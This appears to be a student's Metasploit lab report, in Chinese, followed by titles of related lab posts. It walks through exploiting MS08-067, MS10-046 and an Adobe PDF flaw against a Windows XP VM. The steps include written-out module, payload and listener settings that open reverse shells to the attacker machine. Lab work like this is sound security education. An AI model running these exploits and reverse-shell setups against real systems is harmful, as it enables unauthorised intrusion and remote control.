Exp5 MSF基础应用 20154302 薛师凡

Exp5 MSF基础应用

20154302 薛师凡

一、基础问题回答

(1)用自己的话解释什么是 exploit , payload , encode.

exploit:

是破除门锁的工具以及运送间谍的载具,相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机。

payload:

就是被运送的间谍,到了房子里头就可以执行各种间谍活动。简单来说就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,然后通过管道传输进去后开始为我们控制靶机服务。

encode:

是间谍穿的伪装的衣服,便于间谍潜入目标针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,但是不改变payload为我们所用的特征,但能对payload进行加工。

二、实践过程

本次试验共分为四个部分:

  • 1.一个主动攻击实践,ms08_067
  • 2.一个针对浏览器的攻击,ms10_046漏洞攻击
  • 3.一个针对客户端的攻击,adobe_toolbutton
  • 4.成功应用任何一个辅助模块scanner/postscan/tcp

    和gather blowser_info

实验环境:

攻击机:kali:192.168.238.131

靶机:Windows:192.168.238.130

2.1主动攻击:ms08_067

先百度一下ms08_067漏洞的意思

参考学长的报告得知英文版XP才可以进行漏洞攻击

1.首先查看两个主机的IP地址

2.先msfconsole,再kali主机键入search ms08_067 查看漏洞信息

键输入use exploit/windows/smb/ms08_067_netapi,

3.然后键入show payloads查看需要的payload

此处首先从众地输入了set payload generic/shell_reverse_tcp选择病毒模块

show options查看需要的信息,进行相应设置

4.键入show targets查看适用的靶机版本,可以set target 0自动选择

5.设置好以后输入exploit进行攻击。

连接不上靶机,攻击失败

然后各种失败

然后又互相ping一下,发现WinXP可以ping通kali,但是kali却ping不通WinXP,

,果断关闭防火墙,现在可以ping通了。

再进行攻击,还是失败,于是无奈之下选择了更换病毒模块。

终于成功了!

2. 对浏览器攻击:ms10_046漏洞攻击

基本步骤还是和上面一样,先利用search ms10_046指令查看可以运用的攻击模块:

用use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用该模块,再使用show payloads查看可以供我们使用的payload:

然后查看需要设置的参数,SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:

set LHOST 192.168.238.131

set SRVHOST 192.168.238.131

使用exploit指令执行漏洞,可以看到生成了一个url,在靶机的IE浏览器上使用该url进行访问,

又失败了几次,

换了病毒模块

在MSF终端看见漏洞执行成功:

使用sessions指令查看当前存在的会话,可以看到存在一个ID为1的会话:

使用sessions -i 1选择会话1,成功获取了靶机的shell,利用systeminfo指令查看靶机的系统信息:

3. 对Adobe的漏洞攻击:adobe_toolbutton

先使用search adobe查询和adobe漏洞有关的模块,我选择的是use exploit/windows/fileformat/adobe_toolbutton,然后使用该模块,设置回连的payload:

set LHOST 192.168.238.131

set LPORT 4302

set FILENAME 20154302.pdf

设置:

设置好相应参数后,开始实施攻击,发现在/root/.msf4/local/目录下成功生成了一个lxm.pdf文件:

use exploit/multi/handler

set payload generic/shell_reverse_tcp windows/meterpreter/reverse_tcp

然后将该文件传送到靶机上,并且在攻击机上打开监听:

将靶机中的pdf文件打开,攻击机成功获取到靶机shell:

4、辅助模块应用

辅助模块真的好多啊

这里我用了scanner/postscan/tcp模块

查看其设置的参数

设置好之后,扫描

好像是失败了

更改了设置,好像也没有用

我之后换了gather blowser_info,这是一个通过过网站访问来搜集计算机信息的辅助

info查看要设置的参数,设置好,这次成功了,可以看到系统的信息

三、实验体会

本次实验让我又一次认识了MSF,功能真的强大,

这次实验我们的攻击对象只是XP系统的虚拟机,比较有局限性,随着网络攻击技术的进步,我们更应该学会漏洞的扫描和分析,以及及时的去打好补丁。本次实验从第一个开始就十分不顺利,屡次失败,通过调试网络和更换病毒模块最终取得成功,总体来说还是收获颇丰,而且还磨练了自己的耐心。

原文地址:https://www.cnblogs.com/xsfdbk/p/8887422.html

时间: 2024-10-13 00:32:30

Exp5 MSF基础应用 20154302 薛师凡的相关文章

Exp3 免杀原理与实践20154302薛师凡

Exp3 免杀原理与实践20154302薛师凡 一.实践目标与内容 利用多种工具实现实现恶意代码免杀 在另一台电脑上,杀软开启的情况下,实现运行后门程序并回连成功. 在保证后门程序功能的情况下实现杀软共存. 二.实践过程与步骤 1.使用msf编码器生成的后门程序 上次实践生成的后门程序,直接被360发现了,在virscan网站扫描,也有17个杀毒引擎识别了出来,很容易被辨识出来的. 2.使用veil-evasion生成的后门程序 2.1安装veil平台 apt-get install veil-

Exp1 PC平台逆向破解 20154302薛师凡

Exp1 PC平台逆向破解 20154302薛师凡 一.实践目标 对象是一个名为20154302的linux文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串. 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell.正常情况下这个代码是不会被运行的.我们实践的目标就是想办法运行这个代码片段.我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode. 二.实践内容 1.手工修改可执行文件,改变程序执行流程,直接跳

Exp2 后门原理与实践 20154302薛师凡

一.实践目标与内容 1.学习内容 使用nc实现win,mac,Linux间的后门连接 meterpreter的应用 MSF POST 模块的应用 2.学习目标 学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能.通过亲手实践并了解这一事实,提高自己的安全意识 . 3.概念 后门就是不经过正常认证流程而访问系统的通道. netcat是一个底层工具,进行基本的TCP UDP数据收发.常被与其他工具结合使用,起到后门的作用. socat是ncat的增强版,它使用的格式是socat [op

20155208徐子涵 Exp5 MSF基础应用

20155208徐子涵 Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. Exploit:Exploit 的英文意思就是利用,它在黑客眼里就是漏洞利用.有漏洞不一定就有Exploit(利用).有Exploit就肯定有漏洞,所以说exploit和漏洞就是紧密相关的. Payload:payload属于名词意思有:有效载荷,而在网络攻防这一领域,他也可以说成是有效攻击载荷,相当于是将shellcode进行执行. Encode:encode的意

20155232《网络对抗》Exp5 MSF基础应用

20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击,相当于一个载具 payload:就是攻击的代码,是载荷. encode:为了帮助攻击载荷避免被杀软发现,进行伪装. 实践总结与体会 在辅助模块这里,可以发现很多旧版本的软件有漏洞,从而可以进行相关的攻击,在此次实验中就体验了旧版本有漏洞的一些软件进行了攻击并且很轻易就实现了,所以有漏洞时,一定要尽快打补丁,

《网络对抗》Exp5 MSF基础应用

20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:漏洞利用,与靶机进行交互,攻击靶机的最后一步 payload:有效载荷,后面一般加要对靶机进行攻击的代码,可以实现任何运行在受害者环境中的程序所能做的事情 encode:编码器,对代码进行异或运算.去除坏字符等等,保护payload不被发现 二.实践过程 1.Windows服务渗透攻击--MS08-067安全漏洞 ①攻击机:kali ②靶机:

20155330 《网络对抗》 Exp5 MSF基础应用

20155330 <网络对抗> Exp5 MSF基础应用 实践过程记录 Windows服务渗透:MS08_067漏洞攻击 攻击机:kali IP地址:192.168.124.132 靶机:windows XP SP3 简体中文 IP地址:192.168.124.135 输入命令use exploit/windows/smb/ms08_067_netapi 设置参数 set payload generic/shell_reverse_tcptcp反向回连 set LHOST 192.168.23

20155338 《网络攻防》Exp5 MSF基础应用

20155338 <网络攻防>Exp5 MSF基础应用 基础问题回答 1. 用自己的话解释什么是exploit,payload,encode? exploit将真正要负责攻击的代码传送到靶机中,相当于载具 payload负责执行相应的攻击代码,相当于载荷 encode是伪装,为了避免payload中坏字符影响功能,相当于编码 实验过程 Windows服务渗透攻击--MS08-067安全漏洞 攻击机:kali,ip:172.30.6.185 靶机:windows XP SP3,IP地址是172.

20155209 Exp5 MSF基础应用

Exp5 MSF基础应用 实验准备 在实验之前,上网搜集了很多有关Metasploit渗透测试的资料.对这次实验影响最大的是一篇最受欢迎的10个Metasploit模块和插件.排名第一位的是MSB-MS12-020,比MSB-MS08-067这个经典漏洞的排名还高.我就实验了这个,而且本次实验中很多试了一下这里面的受欢迎漏洞.但是大多数没成功. 实验MSB-MS12-020时,发现他是辅助模块下的漏洞,所以就先写辅助模块的项目. 成功应用任何一个辅助模块 应用MSB-MS12-020辅助模块 漏